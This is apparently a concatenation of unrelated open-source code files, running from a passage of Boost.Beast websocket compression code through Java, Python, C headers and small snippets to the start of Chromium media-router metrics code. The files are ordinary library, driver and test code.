for(auto in : beast::buffers_range_ref(cb))
{
zs.avail_in = in.size();
if(zs.avail_in == 0)
continue;
zs.next_in = in.data();
zo.write(zs, zlib::Flush::none, ec);
if(ec)
{
if(ec != zlib::error::need_buffers)
return false;
BOOST_ASSERT(zs.avail_out == 0);
BOOST_ASSERT(zs.total_out == out.size());
ec = {};
break;
}
if(zs.avail_out == 0)
{
BOOST_ASSERT(zs.total_out == out.size());
break;
}
BOOST_ASSERT(zs.avail_in == 0);
}
total_in = zs.total_in;
cb.consume(zs.total_in);
if(zs.avail_out > 0 && fin)
{
auto const remain = buffer_bytes(cb);
if(remain == 0)
{
// Inspired by <NAME>
// https://github.com/madler/zlib/issues/149
//
// VFALCO We could do this flush twice depending
// on how much space is in the output.
zo.write(zs, zlib::Flush::block, ec);
BOOST_ASSERT(! ec || ec == zlib::error::need_buffers);
if(ec == zlib::error::need_buffers)
ec = {};
if(ec)
return false;
if(zs.avail_out >= 6)
{
zo.write(zs, zlib::Flush::full, ec);
BOOST_ASSERT(! ec);
// remove flush marker
zs.total_out -= 4;
out = net::buffer(out.data(), zs.total_out);
return false;
}
}
}
ec = {};
out = net::buffer(out.data(), zs.total_out);
return true;
}
void
do_context_takeover_write(role_type role)
{
if((role == role_type::client &&
this->pmd_config_.client_no_context_takeover) ||
(role == role_type::server &&
this->pmd_config_.server_no_context_takeover))
{
this->pmd_->zo.reset();
}
}
void
inflate(
zlib::z_params& zs,
zlib::Flush flush,
error_code& ec)
{
pmd_->zi.write(zs, flush, ec);
}
void
do_context_takeover_read(role_type role)
{
if((role == role_type::client &&
pmd_config_.server_no_context_takeover) ||
(role == role_type::server &&
pmd_config_.client_no_context_takeover))
{
pmd_->zi.clear();
}
}
template<class Body, class Allocator>
void
build_response_pmd(
http::response<http::string_body>& res,
http::request<Body,
http::basic_fields<Allocator>> const& req);
void
on_response_pmd(
http::response<http::string_body> const& res)
{
detail::pmd_offer offer;
detail::pmd_read(offer, res);
// VFALCO see if offer satisfies pmd_config_,
// return an error if not.
pmd_config_ = offer; // overwrite for now
}
template<class Allocator>
void
do_pmd_config(
http::basic_fields<Allocator> const& h)
{
detail::pmd_read(pmd_config_, h);
}
void
set_option_pmd(permessage_deflate const& o)
{
if( o.server_max_window_bits > 15 ||
o.server_max_window_bits < 9)
BOOST_THROW_EXCEPTION(std::invalid_argument{
"invalid server_max_window_bits"});
if( o.client_max_window_bits > 15 ||
o.client_max_window_bits < 9)
BOOST_THROW_EXCEPTION(std::invalid_argument{
"invalid client_max_window_bits"});
if( o.compLevel < 0 ||
o.compLevel > 9)
BOOST_THROW_EXCEPTION(std::invalid_argument{
"invalid compLevel"});
if( o.memLevel < 1 ||
o.memLevel > 9)
BOOST_THROW_EXCEPTION(std::invalid_argument{
"invalid memLevel"});
pmd_opts_ = o;
}
void
get_option_pmd(permessage_deflate& o)
{
o = pmd_opts_;
}
void
build_request_pmd(http::request<http::empty_body>& req)
{
if(pmd_opts_.client_enable)
{
detail::pmd_offer config;
config.accept = true;
config.server_max_window_bits =
pmd_opts_.server_max_window_bits;
config.client_max_window_bits =
pmd_opts_.client_max_window_bits;
config.server_no_context_takeover =
pmd_opts_.server_no_context_takeover;
config.client_no_context_takeover =
pmd_opts_.client_no_context_takeover;
detail::pmd_write(req, config);
}
}
void
open_pmd(role_type role)
{
if(((role == role_type::client &&
pmd_opts_.client_enable) ||
(role == role_type::server &&
pmd_opts_.server_enable)) &&
pmd_config_.accept)
{
detail::pmd_normalize(pmd_config_);
pmd_.reset(::new pmd_type);
if(role == role_type::client)
{
pmd_->zi.reset(
pmd_config_.server_max_window_bits);
pmd_->zo.reset(
pmd_opts_.compLevel,
pmd_config_.client_max_window_bits,
pmd_opts_.memLevel,
zlib::Strategy::normal);
}
else
{
pmd_->zi.reset(
pmd_config_.client_max_window_bits);
pmd_->zo.reset(
pmd_opts_.compLevel,
pmd_config_.server_max_window_bits,
pmd_opts_.memLevel,
zlib::Strategy::normal);
}
}
}
void close_pmd()
{
pmd_.reset();
}
bool pmd_enabled() const
{
return pmd_ != nullptr;
}
std::size_t
read_size_hint_pmd(
std::size_t initial_size,
bool rd_done,
std::uint64_t rd_remain,
detail::frame_header const& rd_fh) const
{
using beast::detail::clamp;
std::size_t result;
BOOST_ASSERT(initial_size > 0);
if(! pmd_ || (! rd_done && ! pmd_->rd_set))
{
// current message is uncompressed
if(rd_done)
{
// first message frame
result = initial_size;
goto done;
}
else if(rd_fh.fin)
{
// last message frame
BOOST_ASSERT(rd_remain > 0);
result = clamp(rd_remain);
goto done;
}
}
result = (std::max)(
initial_size, clamp(rd_remain));
done:
BOOST_ASSERT(result != 0);
return result;
}
};
//------------------------------------------------------------------------------
template<>
struct impl_base<false>
{
// These stubs are for avoiding linking in the zlib
// code when permessage-deflate is not enabled.
bool
rd_deflated() const
{
return false;
}
bool
rd_deflated(bool rsv1)
{
return ! rsv1;
}
template<class ConstBufferSequence>
bool
deflate(
net::mutable_buffer&,
buffers_suffix<ConstBufferSequence>&,
bool,
std::size_t&,
error_code&)
{
return false;
}
void
do_context_takeover_write(role_type)
{
}
void
inflate(
zlib::z_params&,
zlib::Flush,
error_code&)
{
}
void
do_context_takeover_read(role_type)
{
}
template<class Body, class Allocator>
void
build_response_pmd(
http::response<http::string_body>&,
http::request<Body,
http::basic_fields<Allocator>> const&);
void
on_response_pmd(
http::response<http::string_body> const&)
{
}
template<class Allocator>
void
do_pmd_config(http::basic_fields<Allocator> const&)
{
}
void
set_option_pmd(permessage_deflate const& o)
{
if(o.client_enable || o.server_enable)
{
// Can't enable permessage-deflate
// when deflateSupported == false.
//
BOOST_THROW_EXCEPTION(std::invalid_argument{
"deflateSupported == false"});
}
}
void
get_option_pmd(permessage_deflate& o)
{
o = {};
o.client_enable = false;
o.server_enable = false;
}
void
build_request_pmd(
http::request<http::empty_body>&)
{
}
void open_pmd(role_type)
{
}
void close_pmd()
{
}
bool pmd_enabled() const
{
return false;
}
std::size_t
read_size_hint_pmd(
std::size_t initial_size,
bool rd_done,
std::uint64_t rd_remain,
frame_header const& rd_fh) const
{
using beast::detail::clamp;
std::size_t result;
BOOST_ASSERT(initial_size > 0);
// compression is not supported
if(rd_done)
{
// first message frame
result = initial_size;
}
else if(rd_fh.fin)
{
// last message frame
BOOST_ASSERT(rd_remain > 0);
result = clamp(rd_remain);
}
else
{
result = (std::max)(
initial_size, clamp(rd_remain));
}
BOOST_ASSERT(result != 0);
return result;
}
};
} // detail
} // websocket
} // beast
} // boost
#endif
| 7,267
|
1,011
|
<filename>pySPlisHSPlasH/examples/callbacks.py
import pysplishsplash as sph
def key_callback():
print("Hello World")
def time_step_callback():
print("step")
def main():
base = sph.Exec.SimulatorBase()
base.init()
gui = sph.GUI.Simulator_GUI_imgui(base)
base.setGui(gui)
gui.addKeyFunc('k', key_callback)
base.setTimeStepCB(time_step_callback)
base.run()
if __name__ == "__main__":
main()
| 170
|
711
|
/*
* Copyright 2015 JBoss Inc
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package io.apiman.gateway.engine.ispn.io;
import io.apiman.gateway.engine.beans.Api;
import io.apiman.gateway.engine.beans.Client;
import java.io.IOException;
import java.util.Collection;
import java.util.Map;
import java.util.Set;
import org.infinispan.Cache;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.util.ISO8601DateFormat;
/**
* Wraps a cache. Stores serialized versions of the objects
* rather than the objects themselves. This is to avoid
* classloader problems between the Gateway API and the
* Gateway.
*
* @author <EMAIL>
*/
public class RegistryCacheMapWrapper implements Map<String, Object> {
private static final ObjectMapper mapper = new ObjectMapper();
static {
mapper.setDateFormat(new ISO8601DateFormat());
}
private Cache<Object,Object> cache;
/**
* Constructor.
*
* @param cache the cache
*/
public RegistryCacheMapWrapper(Cache<Object,Object> cache) {
this.cache = cache;
}
/**
* @see java.util.Map#size()
*/
@Override
public int size() {
return cache.size();
}
/**
* @see java.util.Map#isEmpty()
*/
@Override
public boolean isEmpty() {
return cache.isEmpty();
}
/**
* @see java.util.Map#containsKey(java.lang.Object)
*/
@Override
public boolean containsKey(Object key) {
return cache.containsKey(key);
}
/**
* @see java.util.Map#containsValue(java.lang.Object)
*/
@Override
public boolean containsValue(Object value) {
throw new UnsupportedOperationException();
}
/**
* @see java.util.Map#get(java.lang.Object)
*/
@Override
public Object get(Object key) {
Object value = cache.get(key);
if (value != null) {
try {
if (key.toString().startsWith("API::")) { //$NON-NLS-1$
value = unmarshalAs(value.toString(), Api.class);
} else {
value = unmarshalAs(value.toString(), Client.class);
}
} catch (IOException e) {
throw new RuntimeException(e);
}
}
return value;
}
/**
* @see java.util.Map#put(java.lang.Object, java.lang.Object)
*/
@Override
public Object put(String key, Object value) {
try {
value = mapper.writeValueAsString(value);
} catch (Exception e) {
throw new RuntimeException(e);
}
return cache.put(key, value);
}
/**
* @see java.util.Map#remove(java.lang.Object)
*/
@Override
public Object remove(Object key) {
Object value = cache.remove(key);
if (value != null) {
try {
if (key.toString().startsWith("API::")) { //$NON-NLS-1$
value = unmarshalAs(value.toString(), Api.class);
} else if (key.toString().startsWith("CLIENT::")) { //$NON-NLS-1$
value = unmarshalAs(value.toString(), Client.class);
}
} catch (IOException e) {
throw new RuntimeException(e);
}
}
return value;
}
/**
* @see java.util.Map#putAll(java.util.Map)
*/
@Override
public void putAll(Map<? extends String, ? extends Object> m) {
throw new UnsupportedOperationException();
}
/**
* @see java.util.Map#clear()
*/
@Override
public void clear() {
cache.clear();
}
/**
* @see java.util.Map#keySet()
*/
@Override
public Set<String> keySet() {
throw new UnsupportedOperationException();
}
/**
* @see java.util.Map#values()
*/
@Override
public Collection<Object> values() {
throw new UnsupportedOperationException();
}
/**
* @see java.util.Map#entrySet()
*/
@Override
public Set<java.util.Map.Entry<String, Object>> entrySet() {
throw new UnsupportedOperationException();
}
/**
* Unmarshall the given type of object.
* @param valueAsString
* @param asClass
* @throws IOException
*/
private <T> T unmarshalAs(String valueAsString, Class<T> asClass) throws IOException {
return mapper.reader(asClass).readValue(valueAsString);
}
}
| 2,099
|
335
|
{
"word": "Buff",
"definitions": [
"Polish (something)",
"Give (leather) a velvety finish by removing the surface of the grain.",
"Make (an element in a role-playing or video game) more powerful."
],
"parts-of-speech": "Verb"
}
| 108
|
335
|
<reponame>Safal08/Hacktoberfest-1
{
"word": "Provide",
"definitions": [
"Make available for use; supply.",
"Equip or supply someone with (something useful or necessary)",
"Present or yield (something useful)",
"Make adequate preparation for (a possible event)",
"Supply sufficient money to ensure the maintenance of (someone)",
"(of a law) enable or allow (something to be done)",
"Stipulate in a will or other legal document.",
"Appoint an incumbent to (a benefice)."
],
"parts-of-speech": "Verb"
}
| 213
|
1,144
|
<reponame>bingchunjin/1806_SDK
/*
* ADM5120 specific CPU feature overrides
*
* Copyright (C) 2007-2008 <NAME> <<EMAIL>>
*
* This file was derived from: include/asm-mips/cpu-features.h
* Copyright (C) 2003, 2004 <NAME>
* Copyright (C) 2004 <NAME>
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 as published
* by the Free Software Foundation.
*
*/
#ifndef __ASM_MACH_ADM5120_CPU_FEATURE_OVERRIDES_H
#define __ASM_MACH_ADM5120_CPU_FEATURE_OVERRIDES_H
/*
* The ADM5120 SOC has a built-in MIPS 4Kc core.
*/
#define cpu_has_tlb 1
#define cpu_has_4kex 1
#define cpu_has_3k_cache 0
#define cpu_has_4k_cache 1
#define cpu_has_tx39_cache 0
#define cpu_has_sb1_cache 0
#define cpu_has_fpu 0
#define cpu_has_32fpr 0
#define cpu_has_counter 1
#define cpu_has_watch 1
#define cpu_has_divec 1
/* #define cpu_has_vce ? */
/* #define cpu_has_cache_cdex_p ? */
/* #define cpu_has_cache_cdex_s ? */
#define cpu_has_prefetch 1
/* #define cpu_has_mcheck ? */
#define cpu_has_ejtag 1
#define cpu_has_llsc 1
#define cpu_has_mips16 0
#define cpu_has_mdmx 0
#define cpu_has_mips3d 0
#define cpu_has_smartmips 0
/* #define cpu_has_vtag_icache ? */
/* #define cpu_has_dc_aliases ? */
/* #define cpu_has_ic_fills_f_dc ? */
/* #define cpu_has_pindexed_dcache ? */
/* #define cpu_icache_snoops_remote_store ? */
#define cpu_has_mips32r1 1
#define cpu_has_mips32r2 0
#define cpu_has_mips64r1 0
#define cpu_has_mips64r2 0
#define cpu_has_dsp 0
#define cpu_has_mipsmt 0
/* #define cpu_has_nofpuex ? */
#define cpu_has_64bits 0
#define cpu_has_64bit_zero_reg 0
#define cpu_has_64bit_gp_regs 0
#define cpu_has_64bit_addresses 0
/* #define cpu_has_inclusive_pcaches ? */
#define cpu_dcache_line_size() 16
#define cpu_icache_line_size() 16
#endif /* __ASM_MACH_ADM5120_CPU_FEATURE_OVERRIDES_H */
| 866
|
1,987
|
from social_core.backends.username import UsernameAuth
| 13
|
1,091
|
/*
* Copyright 2020-present Open Networking Foundation
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.onosproject.drivers.odtn.openconfig;
import com.google.common.collect.HashMultimap;
import com.google.common.collect.Maps;
import com.google.common.collect.Multimap;
import com.google.common.collect.Streams;
import gnmi.Gnmi;
import org.onosproject.drivers.gnmi.OpenConfigGnmiDeviceDescriptionDiscovery;
import org.onosproject.gnmi.api.GnmiUtils.GnmiPathBuilder;
import org.onosproject.net.AnnotationKeys;
import org.onosproject.net.ChannelSpacing;
import org.onosproject.net.DefaultAnnotations;
import org.onosproject.net.Device;
import org.onosproject.net.OchSignal;
import org.onosproject.net.OduSignalType;
import org.onosproject.net.PortNumber;
import org.onosproject.net.device.DefaultDeviceDescription;
import org.onosproject.net.device.DeviceDescription;
import org.onosproject.net.device.PortDescription;
import org.onosproject.net.optical.device.OchPortHelper;
import org.onosproject.odtn.behaviour.OdtnDeviceDescriptionDiscovery;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.util.Collection;
import java.util.Collections;
import java.util.List;
import java.util.Map;
import java.util.Objects;
import java.util.concurrent.ExecutionException;
import java.util.stream.Collectors;
import java.util.stream.Stream;
import static org.onosproject.gnmi.api.GnmiUtils.pathToString;
/**
* A ODTN device discovery behaviour based on gNMI and OpenConfig model.
*
* This behavior is based on the origin gNMI OpenConfig device description discovery
* with additional logic to discover optical ports for this device.
*
* To find all optical port name and info, it queries all components with path:
* /components/component[name=*]
* And it uses components with type "OPTICAL_CHANNEL" to find optical ports
*
*/
public class GnmiTerminalDeviceDiscovery
extends OpenConfigGnmiDeviceDescriptionDiscovery
implements OdtnDeviceDescriptionDiscovery {
private static final Logger log = LoggerFactory.getLogger(GnmiTerminalDeviceDiscovery.class);
private static final String COMPONENT_TYPE_PATH_TEMPLATE =
"/components/component[name=%s]/state/type";
private static final String LINE_PORT_PATH_TEMPLATE =
"/components/component[name=%s]/optical-channel/config/line-port";
@Override
public DeviceDescription discoverDeviceDetails() {
return new DefaultDeviceDescription(super.discoverDeviceDetails(),
Device.Type.TERMINAL_DEVICE);
}
@Override
public List<PortDescription> discoverPortDetails() {
if (!setupBehaviour("discoverPortDetails()")) {
return Collections.emptyList();
}
// Get all components
Gnmi.Path path = GnmiPathBuilder.newBuilder()
.addElem("components")
.addElem("component").withKeyValue("name", "*")
.build();
Gnmi.GetRequest req = Gnmi.GetRequest.newBuilder()
.addPath(path)
.setEncoding(Gnmi.Encoding.PROTO)
.build();
Gnmi.GetResponse resp;
try {
resp = client.get(req).get();
} catch (ExecutionException | InterruptedException e) {
log.warn("unable to get components via gNMI: {}", e.getMessage());
return Collections.emptyList();
}
Multimap<String, Gnmi.Update> componentUpdates = HashMultimap.create();
resp.getNotificationList().stream()
.map(Gnmi.Notification::getUpdateList)
.flatMap(List::stream)
.forEach(u -> {
// Get component name
// /components/component[name=?]
Gnmi.Path p = u.getPath();
if (p.getElemCount() < 2) {
// Invalid path
return;
}
String name = p.getElem(1)
.getKeyOrDefault("name", null);
// Collect gNMI updates for the component.
// name -> a set of gNMI updates
if (name != null) {
componentUpdates.put(name, u);
}
});
Stream<PortDescription> normalPorts = super.discoverPortDetails().stream();
Stream<PortDescription> opticalPorts = componentUpdates.keySet().stream()
.map(name -> convertComponentToOdtnPortDesc(name, componentUpdates.get(name)))
.filter(Objects::nonNull);
return Streams.concat(normalPorts, opticalPorts)
.collect(Collectors.toList());
}
/**
* Converts gNMI updates to ODTN port description.
*
* Paths we expected per optical port component:
* /components/component/state/type
* /components/component/optical-channel/config/line-port
*
* @param name component name
* @param updates gNMI updates
* @return port description, null if it is not a valid component config/state
*/
private PortDescription
convertComponentToOdtnPortDesc(String name, Collection<Gnmi.Update> updates) {
Map<String, Gnmi.TypedValue> pathValue = Maps.newHashMap();
updates.forEach(u -> pathValue.put(pathToString(u.getPath()), u.getVal()));
String componentTypePathStr =
String.format(COMPONENT_TYPE_PATH_TEMPLATE, name);
Gnmi.TypedValue componentType =
pathValue.get(componentTypePathStr);
if (componentType == null ||
!componentType.getStringVal().equals("OPTICAL_CHANNEL")) {
// Ignore the component which is not a optical channel type.
return null;
}
Map<String, String> annotations = Maps.newHashMap();
annotations.put(OC_NAME, name);
annotations.put(OC_TYPE, componentType.getStringVal());
String linePortPathStr =
String.format(LINE_PORT_PATH_TEMPLATE, name);
Gnmi.TypedValue linePort = pathValue.get(linePortPathStr);
// Invalid optical port
if (linePort == null) {
return null;
}
// According to CassiniTerminalDevice class, we expected to received a string with
// this format: port-[port id].
// And we use "port id" from the string as the port number.
// However, if we can't get port id from line port value, we will use
// hash number of the port name. (According to TerminalDeviceDiscovery class)
String linePortString = linePort.getStringVal();
long portId = name.hashCode();
if (linePortString.contains("-") && !linePortString.endsWith("-")) {
try {
portId = Long.parseUnsignedLong(linePortString.split("-")[1]);
} catch (NumberFormatException e) {
log.warn("Invalid line port string: {}, use {}", linePortString, portId);
}
}
annotations.put(AnnotationKeys.PORT_NAME, linePortString);
annotations.putIfAbsent(PORT_TYPE,
OdtnDeviceDescriptionDiscovery.OdtnPortType.LINE.value());
annotations.putIfAbsent(ONOS_PORT_INDEX, Long.toString(portId));
annotations.putIfAbsent(CONNECTION_ID, "connection-" + portId);
OchSignal signalId = OchSignal.newDwdmSlot(ChannelSpacing.CHL_50GHZ, 1);
return OchPortHelper.ochPortDescription(
PortNumber.portNumber(portId, name),
true,
OduSignalType.ODU4, // TODO: discover type via gNMI if possible
true,
signalId,
DefaultAnnotations.builder().putAll(annotations).build());
}
}
| 3,390
|
317
|
#include "smack.h"
#include <assert.h>
#include <stdlib.h>
// @expect error
void foo(int *x) { *x = *x + 10; }
int main(void) {
int *y = malloc(sizeof(int));
int tmp = __VERIFIER_nondet_int();
*y = 10;
// using a dummy unreachable call, force DSA to analyze foo so
// that __SMACK_code works properly
assume(tmp == 0);
if (tmp)
foo(y);
__SMACK_code("call foo(@);", y);
assert(*y == 10);
}
| 173
|
852
|
<reponame>ckamtsikis/cmssw
import FWCore.ParameterSet.Config as cms
run2_miniAOD_pp_on_AA_103X = cms.Modifier()
| 52
|
965
|
<reponame>bobbrow/cpp-docs
CString theString(_T("This is a test"));
int sizeOfString = (theString.GetLength() + 1);
LPTSTR lpsz = new TCHAR[sizeOfString];
_tcscpy_s(lpsz, sizeOfString, theString);
//... modify lpsz as much as you want
| 102
|
303
|
/* Abstract Machine for the Pawn compiler, debugger support
*
* This file contains extra definitions that are convenient for debugger
* support.
*
* Copyright (c) ITB CompuPhase, 2005-2011
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy
* of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations
* under the License.
*
* Version: $Id: amxdbg.h 4523 2011-06-21 15:03:47Z thiadmer $
*/
#ifndef AMXDBG_H_INCLUDED
#define AMXDBG_H_INCLUDED
#ifndef AMX_H_INCLUDED
#include "amx.h"
#endif
#ifdef __cplusplus
extern "C" {
#endif
/* Some compilers do not support the #pragma align, which should be fine. Some
* compilers give a warning on unknown #pragmas, which is not so fine...
*/
#if defined SN_TARGET_PS2 || defined __GNUC__
#define AMX_NO_ALIGN
#endif
#if defined __GNUC__
#define PACKED __attribute__((packed))
#else
#define PACKED
#endif
#if !defined AMX_NO_ALIGN
#if defined __LINUX__ || defined __FreeBSD__
#pragma pack(1) /* structures must be packed (byte-aligned) */
#elif defined MACOS && defined __MWERKS__
#pragma options align=mac68k
#else
#pragma pack(push)
#pragma pack(1) /* structures must be packed (byte-aligned) */
#if defined __TURBOC__
#pragma option -a- /* "pack" pragma for older Borland compilers */
#endif
#endif
#endif
typedef struct tagAMX_DBG_HDR {
int32_t size; /* size of the debug information chunk */
uint16_t magic; /* signature, must be 0xf1ef */
char file_version; /* file format version */
char amx_version; /* required version of the AMX */
int16_t flags; /* currently unused */
int16_t files; /* number of entries in the "file" table */
int16_t lines; /* number of entries in the "line" table */
int16_t symbols; /* number of entries in the "symbol" table */
int16_t tags; /* number of entries in the "tag" table */
int16_t automatons; /* number of entries in the "automaton" table */
int16_t states; /* number of entries in the "state" table */
} PACKED AMX_DBG_HDR;
#define AMX_DBG_MAGIC 0xf1ef
typedef struct tagAMX_DBG_FILE {
uint32_t address; /* address in the code segment where generated code (for this file) starts */
char name[1]; /* ASCII string, zero-terminated */
} PACKED AMX_DBG_FILE;
typedef struct tagAMX_DBG_LINE {
uint32_t address; /* address in the code segment where generated code (for this line) starts */
int32_t line; /* line number */
} PACKED AMX_DBG_LINE;
typedef struct tagAMX_DBG_SYMBOL {
uint32_t address; /* address in the data segment or relative to the frame */
int16_t tag; /* tag for the symbol */
uint32_t codestart; /* address in the code segment from which this symbol is valid (in scope) */
uint32_t codeend; /* address in the code segment until which this symbol is valid (in scope) */
char ident; /* kind of symbol (function/variable) */
char vclass; /* class of symbol (global/local) */
int16_t dim; /* number of dimensions */
char name[1]; /* ASCII string, zero-terminated */
} PACKED AMX_DBG_SYMBOL;
typedef struct tagAMX_DBG_SYMDIM {
int16_t tag; /* tag for the array dimension */
uint32_t size; /* size of the array dimension */
} PACKED AMX_DBG_SYMDIM;
typedef struct tagAMX_DBG_TAG {
int16_t tag; /* tag id */
char name[1]; /* ASCII string, zero-terminated */
} PACKED AMX_DBG_TAG;
typedef struct tagAMX_DBG_MACHINE {
int16_t automaton; /* automaton id */
uint32_t address; /* address of state variable */
char name[1]; /* ASCII string, zero-terminated */
} PACKED AMX_DBG_MACHINE;
typedef struct tagAMX_DBG_STATE {
int16_t state; /* state id */
int16_t automaton; /* automaton id */
char name[1]; /* ASCII string, zero-terminated */
} PACKED AMX_DBG_STATE;
typedef struct tagAMX_DBG {
AMX_DBG_HDR *hdr; /* points to the AMX_DBG header */
AMX_DBG_FILE **filetbl;
AMX_DBG_LINE *linetbl;
AMX_DBG_SYMBOL **symboltbl;
AMX_DBG_TAG **tagtbl;
AMX_DBG_MACHINE **automatontbl;
AMX_DBG_STATE **statetbl;
} PACKED AMX_DBG;
#if !defined iVARIABLE
#define iVARIABLE 1 /* cell that has an address and that can be fetched directly (lvalue) */
#define iREFERENCE 2 /* iVARIABLE, but must be dereferenced */
#define iARRAY 3
#define iREFARRAY 4 /* an array passed by reference (i.e. a pointer) */
#define iFUNCTN 9
#endif
int AMXAPI dbg_FreeInfo(AMX_DBG *amxdbg);
int AMXAPI dbg_LoadInfo(AMX_DBG *amxdbg, FILE *fp);
int AMXAPI dbg_LinearAddress(AMX *amx, ucell relative_addr, ucell *linear_addr);
int AMXAPI dbg_LookupFile(AMX_DBG *amxdbg, ucell address, const char **filename);
int AMXAPI dbg_LookupFunction(AMX_DBG *amxdbg, ucell address, const char **funcname);
int AMXAPI dbg_LookupLine(AMX_DBG *amxdbg, ucell address, long *line);
int AMXAPI dbg_GetFunctionAddress(AMX_DBG *amxdbg, const char *funcname, const char *filename, ucell *address);
int AMXAPI dbg_GetLineAddress(AMX_DBG *amxdbg, long line, const char *filename, ucell *address);
int AMXAPI dbg_GetAutomatonName(AMX_DBG *amxdbg, int automaton, const char **name);
int AMXAPI dbg_GetStateName(AMX_DBG *amxdbg, int state, const char **name);
int AMXAPI dbg_GetTagName(AMX_DBG *amxdbg, int tag, const char **name);
int AMXAPI dbg_GetVariable(AMX_DBG *amxdbg, const char *symname, ucell scopeaddr, const AMX_DBG_SYMBOL **sym);
int AMXAPI dbg_GetArrayDim(AMX_DBG *amxdbg, const AMX_DBG_SYMBOL *sym, const AMX_DBG_SYMDIM **symdim);
#if !defined AMX_NO_ALIGN
#if defined __LINUX__ || defined __FreeBSD__
#pragma pack() /* reset default packing */
#elif defined MACOS && defined __MWERKS__
#pragma options align=reset
#else
#pragma pack(pop) /* reset previous packing */
#endif
#endif
#ifdef __cplusplus
}
#endif
#endif /* AMXDBG_H_INCLUDED */
| 2,624
|
580
|
// https://leetcode.com/problems/running-sum-of-1d-array/submissions/
class Solution {
public:
vector<int> runningSum(vector<int>& nums) {
vector<int>s;
if(nums.size() == 0)
return s;
s.push_back(nums[0]);
int sum;
// Add first element;
for(int i =0; i< nums.size()-1; i++)
{
sum = 0;
for(int j=0; j <=i+1; j++)
{
sum += nums[j];
}
s.push_back(sum);
}
return s;
}
};
| 340
|
1,178
|
<reponame>leozz37/makani<gh_stars>1000+
/* Hash Table Helper for Trees
Copyright (C) 2012-2014 Free Software Foundation, Inc.
Contributed by <NAME> <<EMAIL>>
This file is part of GCC.
GCC is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3, or (at your option)
any later version.
GCC is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with GCC; see the file COPYING3. If not see
<http://www.gnu.org/licenses/>. */
#ifndef GCC_TREE_HASHER_H
#define GCC_TREE_HASHER_H 1
#include "hash-table.h"
struct int_tree_map {
unsigned int uid;
tree to;
};
/* Hashtable helpers. */
struct int_tree_hasher : typed_free_remove <int_tree_map>
{
typedef int_tree_map value_type;
typedef int_tree_map compare_type;
static inline hashval_t hash (const value_type *);
static inline bool equal (const value_type *, const compare_type *);
};
/* Hash a UID in a int_tree_map. */
inline hashval_t
int_tree_hasher::hash (const value_type *item)
{
return item->uid;
}
/* Return true if the uid in both int tree maps are equal. */
inline bool
int_tree_hasher::equal (const value_type *a, const compare_type *b)
{
return (a->uid == b->uid);
}
typedef hash_table <int_tree_hasher> int_tree_htab_type;
#endif /* GCC_TREE_HASHER_H */
| 539
|
2,151
|
<filename>chrome/browser/media/router/mojo/media_router_mojo_metrics.cc
// Copyright 2016 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "chrome/browser/media/router/mojo/media_router_mojo_metrics.h"
#include "base/macros.h"
#include "base/metrics/histogram_macros.h"
#include "base/version.h"
#include "components/version_info/version_info.h"
#include "extensions/common/extension.h"
namespace media_router {
// static
constexpr char MediaRouterMojoMetrics::kHistogramProviderCreateRouteResult[] =
"MediaRouter.Provider.CreateRoute.Result";
constexpr char
MediaRouterMojoMetrics::kHistogramProviderCreateRouteResultWiredDisplay[] =
"MediaRouter.Provider.CreateRoute.Result.WiredDisplay";
constexpr char MediaRouterMojoMetrics::kHistogramProviderJoinRouteResult[] =
"MediaRouter.Provider.JoinRoute.Result";
constexpr char
MediaRouterMojoMetrics::kHistogramProviderJoinRouteResultWiredDisplay[] =
"MediaRouter.Provider.JoinRoute.Result.WiredDisplay";
constexpr char
MediaRouterMojoMetrics::kHistogramProviderRouteControllerCreationOutcome[] =
"MediaRouter.Provider.RouteControllerCreationOutcome";
constexpr char
MediaRouterMojoMetrics::kHistogramProviderTerminateRouteResult[] =
"MediaRouter.Provider.TerminateRoute.Result";
constexpr char MediaRouterMojoMetrics::
kHistogramProviderTerminateRouteResultWiredDisplay[] =
"MediaRouter.Provider.TerminateRoute.Result.WiredDisplay";
constexpr char MediaRouterMojoMetrics::kHistogramProviderVersion[] =
"MediaRouter.Provider.Version";
constexpr char MediaRouterMojoMetrics::kHistogramProviderWakeReason[] =
"MediaRouter.Provider.WakeReason";
constexpr char MediaRouterMojoMetrics::kHistogramProviderWakeup[] =
"MediaRouter.Provider.Wakeup";
// static
void MediaRouterMojoMetrics::RecordMediaRouteProviderWakeReason(
MediaRouteProviderWakeReason reason) {
DCHECK_LT(static_cast<int>(reason),
static_cast<int>(MediaRouteProviderWakeReason::TOTAL_COUNT));
UMA_HISTOGRAM_ENUMERATION(
kHistogramProviderWakeReason, static_cast<int>(reason),
static_cast<int>(MediaRouteProviderWakeReason::TOTAL_COUNT));
}
// static
void MediaRouterMojoMetrics::RecordMediaRouteProviderVersion(
const extensions::Extension& extension) {
MediaRouteProviderVersion version = MediaRouteProviderVersion::UNKNOWN;
version = GetMediaRouteProviderVersion(extension.version(),
version_info::GetVersion());
